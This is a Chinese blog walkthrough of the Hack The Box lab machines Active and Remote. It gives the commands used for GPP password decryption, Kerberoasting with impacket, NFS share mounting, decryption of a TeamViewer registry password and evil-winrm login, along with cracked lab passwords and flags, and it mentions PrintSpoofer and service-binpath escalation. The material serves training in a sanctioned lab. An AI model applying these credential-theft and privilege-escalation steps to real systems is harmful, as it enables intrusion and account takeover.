HTB-oscplike-Active+Remote

最新推荐文章于 2023-04-25 13:27:33 发布
最新推荐文章于 2023-04-25 13:27:33 发布
阅读量2.2k 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53302733/article/details/124286850
版权

HTB-oscplike-Active+Remote

Active

    NETLOGON                                                NO ACCESS       Logon server share 
    Replication                                             READ ONLY
    SYSVOL                                                  NO ACCESS       Logon server share 
    Users                                                   NO ACCESS

直接smbclient进去Replication嗯找 最后在Groups.xml找到一段
name=“active.htb\SVC_TGS”
cpassword=“edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ”
这勾八怎么解 查了查发现是老的GPPXML可以用gpp-decrypt

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

然后以这个可以去NETLOGON、Replication、SYSVOL、Users
在User里可以直接找到flag d21ad3127a11d4f01e4fe7f2318285b4

但是到这突然就断了 思来想去重回开头开冲88端口

impacket-GetUserSPNs -dc-ip 10.10.10.100 active.htb/SVC_TGS -request
得到
$krb5tgs 23 23 23Administrator A C T I V E . H T B ACTIVE.HTB ACTIVE.HTBactive.htb/Administrator$237a9…
一堆哈希 解出来密码是 Ticketmaster1968

smbmap可以读写c$了 登上去拿到root的flag
af43ccf8848ffc369eac16a900854cfe

请添加图片描述

Remote

easy难度的remote 靶机IP 10.10.10.180
sudo nmap -sS -sV -A -p- --min-rate=1000 -Pn 10.10.10.180
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
111/tcp open rpcbind 2-4 (RPC #100000)
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

80进去发现是umbraco 可以searchsploit但是不知道版本
ftp和smbmap都没东西 这里删了一些细节就是111下面有nfs挂载

showmount --exports 10.10.10.180
/site_backups (everyone)
sudo mount -t nfs 10.10.10.180:/site_backups /tmp/t

然后就是嗯翻文件 其中umbraco里给了一堆骗人的东西
ping.aspx里就一句i’m alive之类的

翻翻翻后总体里面就两个收获 一个是确定了版本7.12.4
另一个是得到了用户名admin@htb.local和哈希 解出来是baconandcheese

然后用7.12.4版本的rce 这个现成的脚本有几个坑点我搞了半天
但是我不说 为什么不说 因为我没素质
连上去拿到user的flag cc2f7e8042417aa73fcdb934a2713dc1

接下来提权 进去netstat -ano看到5939端口被本地监听 PID是2304
tasklist | findstr 2304 看到是teamviewer
where.exe /R c:\ teamviewer*.* 找到路径且发现版本是7
searchsploit找不到东西 但是google可以看到
https://whynotsecurity.com/blog/teamviewer/

找到那就简单了cd HKLM:\software\wow6432node\teamviewer\version7进入注册表
get-itemproperty -path . 看到securitypasswordaes 导出来
(get-itemproperty -path .).securitypasswordaes
然后拿给的脚本解密就行了 多写两行转一下16进制即可
请添加图片描述

运行得到ff9b1c73d66bce31ac413eae131b464f582f6ce2d1e1f3da7e8d376b26394e5b
00000000: 21 00 52 00 33 00 6D 00 30 00 74 00 65 00 21 00 !.R.3.m.0.t.e.!.
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …
None
!R3m0te!

然后5985开着 直接evil-winrm登上去就行了 拿到root的flag
c35a9bbf8c3f7a7e5ee80c62b3d62e1b

但是其实这台机子不止一种提权方法
一方面whoami /all会发现土豆一家是可以用的
但是版本是2019的 所以普通土豆不行 要用PrintSpoofer 也是可以提权的

另一方面 winpeas在扫的时候可以看到UsoSvc: AllAccess, Start
很明显是sc提权了 sc停掉服务 然后改binpath到你的shell上再启动就提权了

但是我感觉第一个提权才是他想考的 要不也太简单了

请添加图片描述

ore0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
HTB-Active(域、Groups.xml、服务票据TGS)
墨痕诉清风的博客
05-28 1348
除了自定义共享之外,我还可以看到SYSVOL共享,它包含一组文件和文件夹,这些文件和文件夹驻留在域中的每个域控制器上,并由文件复制服务(FRS)复制。找到密码后,我做的第一件事就是创建users.txt文件和password.txt文件,并将我的发现添加到相应的文件中。由于这不是一个标准的NTLM散列,我需要破解它,所以我完整地复制了它,并将其粘贴到一个名为hash.txt的文件中。接下来,我打开了递归模式并关闭了提示,这样我就可以在共享中一次看到所有文件,并下载我想要的文件,而不会被提示继续。
HTBActive渗透测试
MSB_WLAQ的博客
09-30 712
基础信息 简介:Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能,平台环境都是模拟的真实环境,有助于自己更好的适应在真实环境的渗透。 链接:https://www.hackthebox.eu/home/machines/profile/113 描述: 注:没有网络安全就没有国家安全,以巩固国家安全防护为由对于该计算机进行渗透,所有行为都是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的.
HTB打靶(Active Directory 101 Active)
qq_18811919的博客
12-30 903
HackTheBox Active Directory 101 Active
oscplike:Kioptix Level 1渗透笔记
fmyyy1的博客
05-31 279
因为靶机都是在内网的,省时间写了个bash脚本利用ping命令快速探测存活主机。不过一般都是用nmap #!/bin/bash if [ $1 == ""] then echo "Usage: ./pingsweep.sh [network]" echo "Example: ./pingsweep.sh 192.168.1" else for ip in `seq 1 254`; do ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | sed
HTB-oscplike-Object
m0_53302733的博客
04-21 3173
HTB-oscplike-Object hard难度的object 靶机IP 10.10.11.132 也不知道是这个靶机出的晚刚加上还是很多人oscplike机器打不到这最后一台 这台总共就一百来个人通了 sudo nmap -sC -sV -A -p- --min-rate=1000 -Pn 10.10.11.132 80/tcp open http Microsoft IIS httpd 10.0 5985/tcp open http Microsoft HTTPAPI httpd
shaper-scripts:示例防火墙 + HTB + IMQ
05-29
信息 ifconfig eth0: flags=4163<UP> mtu 1500 inet 192.168.120.160 网络掩码 255.255.255.0 广播 192.168.120.255 inet6:80:40ffab0c0c 前缀:80:40ffab0c00c 前缀:280:4000c0c e8:fa:b3 txqueuelen 1000 ...
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
ROS3.30 +HTB+DSCP-L7
10-11
ROS3.30 +HTB+DSCP-L7
HTB-Solutions
03-09
HTB-Solutions
No.6-Active-难度简单-HTB-walkthrough
weixin_43851945的博客
02-10 442
No.6-Active-难度简单-HTB-walkthrough 攻击机:官方Kali linux 2019 64位 作者:Ikonw 靶机介绍 一,端口扫描 这边我用的是我在OSCP时候用的一个脚本工具(懒惰) nmapAutomator ./nmapAutomator.sh 10.10.10.100 Full 除了53和445并没有什么特别能交互的端口 Starting Nmap 7.8...
HTB-oscplike-sense+solidstate+node
m0_53302733的博客
03-30 1708
HTB-oscplike-sense+solidstate+node Sense easy难度的sense 靶机IP 10.10.10.60 nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.60 PORT STATE SERVICE VERSION 80/tcp open http lighttpd 1.4.35 443/tcp open ssl/http lighttpd 1.4.35 dirsearch看到changelog.txt
HTB-oscplike-Fuse+Intelligence
m0_53302733的博客
04-21 3913
HTB-oscplike-Fuse+Intelligence Fuse 除开忙了几天耽误了一段时间 这个月二十多天加上没记录的打了五十多台机器了 htb会员也马上到期了 这两天找几台AD域的打打 回头就打oscp里的机器了 medium难度的fuse 靶机IP 10.10.10.193 sudo nmap -sS -sV -A -p- --min-rate=1000 -Pn 10.10.10.193 53/tcp open domain Simple DNS Plus 80/tcp
HTB-oscplike-Bastian+Secnotes
m0_53302733的博客
04-12 2292
HTB-oscplike-Bastian+Secnotes Bastian easy难度的bastion 靶机IP 10.10.10.134 sudo nmap -sC -sV -p- --min-rate=1000 -Pn 10.10.10.134 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0) 135/tcp open msrpc? 139/tcp open netbios-ssn? 445/tcp
Hack The Box——Remote
热门推荐
江左盟的博客
03-30 1万+
简介 信息收集 使用Nmap扫描目标主机发现目标主机开启21,80,111,135,139和445端口,且操作系统极有可能是Windows Server 2012,如图: 尝试使用匿名用户登录ftp成功,如图: 但是没发现任何文件, 漏洞发现 漏洞利用 权限提升 总结 ...
Hack The Box 系列域渗透之靶机Cascade
FreeBuf_的博客
12-09 759
本小白最近在学域渗透,决定把Hack The Box的Active Directory 101 系列域渗透靶机打完,并详细记录当中用到的工具、知识点及其背后的原理。本篇文章是该系列的第八篇,靶机名字为Cascade。
中间件版本信息泄露:Microsoft-HTTPAPI/2.0
ilqgffvramusm2864的博客
12-01 2980
中间件版本泄露、隐藏版本号、Microsoft-HTTPAPI 版本泄露 、IIS版本泄露
【Hack The Box】windows练习-- acute
人间体佐菲的博客
11-18 391
【Hack The Box】windows练习-- acute
OSCP-Compromised(powershell日志、5985)
墨痕诉清风的博客
04-25 681
如果机器无法ping www.example.com(Google DNS服务器),脚本将根据脚本在目标系统上退出8.8.8.8,并且如果机器名称“受损”,脚本将退出。移除这些条件,剩下下面的脚本。但是,能够访问用户“scripting”的整个用户目录。从输出中,注意到下面的命令的多个实例正在系统上执行。正如可以通过命令所知道的,有效载荷是以base64编码的。从脚本中提取Base64字符串并通过base64运行它,发现一个潜在的密码字符串。检查用户组成员身份,看到用户脚本是“事件日志读取器”组的成员。
cozyhosting+htb
最新发布
09-20
CSDN AI助手(C知道):对于你提到的 "cozyhosting htb",我理解的是你在提及CTF平台Hack The Box中的CozyHosting机器。CozyHosting是一个涉及Web应用安全的挑战。你可能需要在Hack The Box平台上登录并进行相关操作才能解决这个挑战。具体的解题步骤我无法提供,因为每个挑战都设计得非常独特,需要你自己进行思考和尝试。 如果你对Hack The Box平台或CozyHosting有进一步的问题,我会尽力帮助你。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值